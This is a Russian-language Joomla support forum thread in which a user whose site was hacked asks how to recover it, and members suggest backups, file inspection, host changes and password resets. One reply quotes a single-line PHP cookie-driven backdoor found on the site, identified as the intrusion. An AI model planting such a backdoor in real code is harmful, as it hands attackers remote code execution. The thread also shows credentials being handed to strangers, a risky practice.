0 Пользователей и 1 Гость просматривают эту тему.
  • 30 Ответов
  • 6892 Просмотров
*

Lirik

  • Захожу иногда
  • 134
  • 1 / 1
Доброго времени уважаемые. Произошло следующее, сайт пропал, а вместо него поле для ввода пароля. На хосте несколько резервных копий, но сайт из бэкапа не восстанавливается. Саппорт отморозился. Погуглил, некоторые пишут, что сайт взломан и "какая-то хрень залезла в БД" - цитирую. Но инфы очень мало, необходима консультация, может кто сталкивался с такой проблемой. Заранее благодарен.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Как восстановить сайт без бэкапа?
« Ответ #1 : 01.02.2016, 09:06:59 »
В бд может и не залезла. Посмотрите index.php шаблона и сайта. А вообще лечить надо.
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Как восстановить сайт без бэкапа?
« Ответ #2 : 01.02.2016, 10:07:49 »
Срочно вытащите оттуда то, что осталось - все файлы, и слейте базу данных. Это первое, что нужно сделать (и нужно было делать раньше). После этого смотрите, что у вас в файлах. Если они целы (что вероятнее всего), возможно придется просто удалить некоторый код. Если же поврежден сильно, придется плясать с бубном. Сначала слейте с хостинга все данные, потом напишите, что там осталось.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

vipiusss

  • Гуру
  • 5739
  • 344 / 11
  • Скайп: renor_
Re: Как восстановить сайт без бэкапа?
« Ответ #3 : 01.02.2016, 10:19:30 »
И поменяйте хост-раз такие свистопляски с отморажеванием у них.
А вообще всегда ручками надо бекапы делать (что я и делаю) -даже у моего (да и у любого хоста) могут
быть технические неурядицы.

Цитата моего хоста (недавно сбой был):

Здравствуйте,

К сожалению, вынужден констатировать, что ввел вас в заблуждение. Я неправильно прочитал даты бекапов. Собственно, проблема в том, что почти пол месяца бекапы не делались полностью из-за не замеченной вовремя ошибки файловой системы, потому у нас нет бекапов файлов вашего аккаунта за 21, 22, 23. Приносим извинения за неудобства.


И компонентам, делающим бекапы, тоже не особо доверяю:сайт сломают и компонент в топку тоже.

Так что советую только ручками!

По вашей проблеме-подымайте, всё что осталось, лечите и .....добавляйте, что не восстановилось.
Выбора то нет особо.
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

alex-m

  • Осваиваюсь на форуме
  • 32
  • 0 / 0
Re: Как восстановить сайт без бэкапа?
« Ответ #4 : 01.02.2016, 12:31:25 »
Доброго времени уважаемые. Произошло следующее, сайт пропал, а вместо него поле для ввода пароля. На хосте несколько резервных копий, но сайт из бэкапа не восстанавливается. Саппорт отморозился. Погуглил, некоторые пишут, что сайт взломан и "какая-то хрень залезла в БД" - цитирую. Но инфы очень мало, необходима консультация, может кто сталкивался с такой проблемой. Заранее благодарен.

В каком формате резервные копии?
*

Lirik

  • Захожу иногда
  • 134
  • 1 / 1
Re: Как восстановить сайт без бэкапа?
« Ответ #5 : 01.02.2016, 15:27:47 »
Большое спасибо за ответы! Попробую, правда с кодом не особо дружу, но как вредоносный выглядит знаю примерно. Самое плохое, что на этом хостинге, на этом же аккаунте есть еще несколько моих сайтов ((.

В каком формате резервные копии?


Копии хранятся на хостинге, фз в каком формате)

*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Как восстановить сайт без бэкапа?
« Ответ #6 : 01.02.2016, 15:45:03 »
Если архив, то обычно TGZ или ZIP. Скачайте на комп себе все, что можно скачать, пригодиться...
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Lirik

  • Захожу иногда
  • 134
  • 1 / 1
Re: Как восстановить сайт без бэкапа?
« Ответ #7 : 02.02.2016, 00:52:25 »
Если архив, то обычно TGZ или ZIP. Скачайте на комп себе все, что можно скачать, пригодиться...
Да там вообще фиг поймешь как они хранятся, все через одно место. Угораздило же меня с этим хостингом. Посоветуйте пожалуйста не очень дорогой, нормальный хостинг. Буду признателен.
*

vipiusss

  • Гуру
  • 5739
  • 344 / 11
  • Скайп: renor_
Re: Как восстановить сайт без бэкапа?
« Ответ #8 : 02.02.2016, 00:55:58 »
Если у вас нет категоричности разделения России и Украины, я пользуюсь своим хостом более 7 лет.
https://hvosting.ua

Ценовую политику сами сравните.Ну и техн.данные.
Нареканий нету ни у меня, ни у клиентов.
Бекап храниться месяц.
Тех.под. 24 h/
Всего 1 раз было сбой на 3 дня и я просёк это(провтыкался бекап).
Но повторюсь-лучший бекап-это ручками.
///
У вас будет реферал и вы будете иметь 12% от оплат рефералов.
Я вообще не плачу за хост лет 5 уже.
« Последнее редактирование: 02.02.2016, 01:00:44 от vipiusss »
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

Lirik

  • Захожу иногда
  • 134
  • 1 / 1
Re: Как восстановить сайт без бэкапа?
« Ответ #9 : 02.02.2016, 00:59:01 »
vipiusss, большое спасибо, посмотрю.
*

alex-m

  • Осваиваюсь на форуме
  • 32
  • 0 / 0
Re: Как восстановить сайт без бэкапа?
« Ответ #10 : 02.02.2016, 10:02:35 »
Да там вообще фиг поймешь как они хранятся, все через одно место. Угораздило же меня с этим хостингом. Посоветуйте пожалуйста не очень дорогой, нормальный хостинг. Буду признателен.

Ну так посмотрите сначала, а иначе как мы вам что-то посоветуем?
Проще всего и надежнее будет восстановить сайт из бэкапа, чтобы не возиться с поиском и удалением вирусов и закладок.
*

alex-m

  • Осваиваюсь на форуме
  • 32
  • 0 / 0
Re: Как восстановить сайт без бэкапа?
« Ответ #11 : 02.02.2016, 10:22:16 »
Lirik

В личку отправил вариант хостинга, которым пользуюсь.

Если дадите доступ к вашему FTP и админке, могу посмотреть, что там с бэкапами и можно ли быстро восстановить.
Это на самом деле несложно, если знать, куда смотреть :)
*

vipiusss

  • Гуру
  • 5739
  • 344 / 11
  • Скайп: renor_
Re: Как восстановить сайт без бэкапа?
« Ответ #12 : 02.02.2016, 10:26:39 »
В личку отправил вариант хостинга, которым пользуюсь.
И нам покажите, если это не тайна мальчиша-кибальчиша.
///
ТС-скопируйте на комп всё, что есть, укажите в вашем новом посте имя файла(можете изменить) и ! после "точки" тип расширения файла.
Если это в архивах-распакуйте и укажите.
а ещё я могу посоветовать дельного человека(не очень дорого) и он попробует восстановить вам за "мелкие печеньки".
Но при этом вы должны дать полный доступ и ! сделать бекап хотя бы того, что есть.
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Как восстановить сайт без бэкапа?
« Ответ #13 : 02.02.2016, 10:33:10 »
Раз уж на то пошло, выкладывайте здесь в открытый доступ логин и пароль к FTP, все равно потом их менять. Предварительно сохраните базу и сайт, включая бекапы. Вам все разъяснят, расскажут. Можете параллельно развернуть сайт локально. Сделаете необходимые исправления, смените пароли и развернете сайт заново. Это будет быстрее, чем по крупицам собирать не зная чего...
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

vipiusss

  • Гуру
  • 5739
  • 344 / 11
  • Скайп: renor_
Re: Как восстановить сайт без бэкапа?
« Ответ #14 : 02.02.2016, 10:50:13 »
ну зачем всем.щас полезут все, кому не лень.
одному!
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

alex-m

  • Осваиваюсь на форуме
  • 32
  • 0 / 0
Re: Как восстановить сайт без бэкапа?
« Ответ #15 : 02.02.2016, 11:30:01 »
ну зачем всем.щас полезут все, кому не лень.
одному!

Да, всем не надо, а то бардак начнется - не поймешь кто что делает :)
*

alex-m

  • Осваиваюсь на форуме
  • 32
  • 0 / 0
Re: Как восстановить сайт без бэкапа?
« Ответ #16 : 02.02.2016, 11:44:37 »
.
« Последнее редактирование: 10.02.2016, 10:54:02 от alex-m »
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Как восстановить сайт без бэкапа?
« Ответ #17 : 02.02.2016, 11:45:01 »
Да, всем не надо, а то бардак начнется - не поймешь кто что делает :)
Я не призывал что то делать, я призывал посмотреть, что да как, и расписать все ТС, что и где менять, что бы он сам смог все поправить. Все равно туда доступ уже получили, однозначно менять все пароли, как минимум. Данные он сольет к себе. А дальше даст возможность полазить, посмотреть, что к чему. После того, как ТС получит советы и на своем локальном сервере все сделает, он меняет пароли и заливает уже исправленный сайт.

Касательно таймвеба - отвечают да, оперативно. Но настройки у них такие, что даже можно выполнять код за пределами корневого каталога сайта. То есть если получить доступ на запись, сломают все сайты аккаунта. Советую при выборе хостера прислушаться к vipiusss.
« Последнее редактирование: 02.02.2016, 11:48:11 от SeBun »
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

alex-m

  • Осваиваюсь на форуме
  • 32
  • 0 / 0
Re: Как восстановить сайт без бэкапа?
« Ответ #18 : 02.02.2016, 11:48:37 »
Я не призывал что то делать, я призывал посмотреть, что да как, и расписать все ТС, что и где менять, что бы он сам смог все поправить. Все равно туда доступ уже получили, однозначно менять все пароли, как минимум. Данные он сольет к себе. А дальше даст возможность полазить, посмотреть, что к чему. После того, как ТС получит советы и на своем локальном сервере все сделает, он меняет пароли и заливает уже исправленный сайт.

Согласен, тоже нормальный вариант.
*

Lirik

  • Захожу иногда
  • 134
  • 1 / 1
Re: Как восстановить сайт без бэкапа?
« Ответ #19 : 02.02.2016, 12:33:36 »
Ну так посмотрите сначала, а иначе как мы вам что-то посоветуем?
Проще всего и надежнее будет восстановить сайт из бэкапа, чтобы не возиться с поиском и удалением вирусов и закладок.


Нет бекапа, вернее он есть, но сайт из него не восстанавливается.

Раз уж на то пошло, выкладывайте здесь в открытый доступ логин и пароль к FTP, все равно потом их менять. Предварительно сохраните базу и сайт, включая бекапы. Вам все разъяснят, расскажут. Можете параллельно развернуть сайт локально. Сделаете необходимые исправления, смените пароли и развернете сайт заново. Это будет быстрее, чем по крупицам собирать не зная чего...

Спасибо за предложение! В ЛС сейчас скину доступ. На хосте несколько сайтов, взломан этот http://lift-rostov.ru/.
*

vipiusss

  • Гуру
  • 5739
  • 344 / 11
  • Скайп: renor_
Re: Как восстановить сайт без бэкапа?
« Ответ #20 : 02.02.2016, 14:57:34 »
2 alex-m:нельзя рефералки давать (читайте правила), даже и/или с условиями, щас "добрый" дядько Voland увидит, бухтеть долго будет.
Он любит такое.
Совет-измените пост ваш.
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Как восстановить сайт без бэкапа?
« Ответ #21 : 02.02.2016, 15:08:32 »
щас "добрый" дядько Voland увидит, бухтеть долго будет.
Боюсь, у него разговор будет короче )
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

vipiusss

  • Гуру
  • 5739
  • 344 / 11
  • Скайп: renor_
Re: Как восстановить сайт без бэкапа?
« Ответ #22 : 02.02.2016, 15:18:36 »
Боюсь, у него разговор будет короче )

скоро его Ник будет собственным, аля как детей пугают "бабаем" )))
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

Lirik

  • Захожу иногда
  • 134
  • 1 / 1
Re: Как восстановить сайт без бэкапа?
« Ответ #23 : 02.02.2016, 16:06:28 »
Просмотрел папки index php и .htacctss, вроде бы ничего подозрительного, ни каких кракозбров, все на месте... правда я нуб, многого не знаю. Может кто нить глянет, профессиональным взглядом, на вскидку? И где еще искать эту "зарытую собаку"?

Спойлер
[свернуть]

Спойлер
[свернуть]
*

alex-m

  • Осваиваюсь на форуме
  • 32
  • 0 / 0
Re: Как восстановить сайт без бэкапа?
« Ответ #24 : 02.02.2016, 16:31:55 »
2 alex-m:нельзя рефералки давать (читайте правила), даже и/или с условиями, щас "добрый" дядько Voland увидит, бухтеть долго будет.
Он любит такое.
Совет-измените пост ваш.

Спасибо, убрал.
Я поэтому перед ссылкой предупредил, что реферальная.
*

alex-m

  • Осваиваюсь на форуме
  • 32
  • 0 / 0
Re: Как восстановить сайт без бэкапа?
« Ответ #25 : 02.02.2016, 16:42:24 »
Lirik,

Я несколько лет назад на борьбу с одним взломанным сайтом столько времени потратил - ужас просто, вроде все вычистишь - отлично, все работает, через неделю смотришь - опять левые файлы появляются, в обычных Joomla файлах тупо прописывают свой код - и все.
Год или полтора мучался, столько времени потратил, иногда чуть ли не до истерики доходило, как эти твари на свете живут, из-за каких-то своих ссылок на такие подлости...

Так и не победил, в итоге со старых чистых версий восстановил, на отдельный хостинг, все доступы торжественно передал заказчику.
Вроде помогло, по-крайней мере не жаловались.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Как восстановить сайт без бэкапа?
« Ответ #26 : 02.02.2016, 18:19:52 »
Код
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);

Это взлом.. И не только это
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Как восстановить сайт без бэкапа?
« Ответ #27 : 02.02.2016, 21:40:20 »
Я несколько лет назад на борьбу с одним взломанным сайтом столько времени потратил - ужас просто, вроде все вычистишь - отлично, все работает, через неделю смотришь - опять левые файлы появляются, в обычных Joomla файлах тупо прописывают свой код - и все.
Год или полтора мучался, столько времени потратил, иногда чуть ли не до истерики доходило, как эти твари на свете живут, из-за каких-то своих ссылок на такие подлости...
Держал у себя сайты знакомых на wp, которые взламывали и рассылали спам. Отключил возможность отправки email-ов на сервере - несчастные пираты сами ушли)))
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Как восстановить сайт без бэкапа?
« Ответ #28 : 02.02.2016, 21:47:47 »
несчастные пираты сами ушли)))

А как же дорвеи, продажа ссылок и прочее? Чет странные пираты.
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Как восстановить сайт без бэкапа?
« Ответ #29 : 02.02.2016, 21:56:39 »
Там на столько доходяжные сайты, что с таких ссылку возьмёшь, только если тебе приплатят) Ну и плюс я постоянно бэкап откатывал) Надоело им впустую работать.

Кстати видел тут похожую тему, сейчас вспомнил. Человек тоже писал, что спрашивается странный пароль, вместо админки, а потом выяснил, что это был глюк какого-то плагина, редактора вроде.
« Последнее редактирование: 02.02.2016, 22:01:26 от ChaosHead »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как правильно установить backup вирсию сайта?

Автор webprogrammer777

Ответов: 9
Просмотров: 4211
Последний ответ 16.06.2012, 22:29:24
от rwgusev
Массовая закачка изображений

Автор Михайло

Ответов: 2
Просмотров: 3560
Последний ответ 11.03.2012, 20:07:56
от Михайло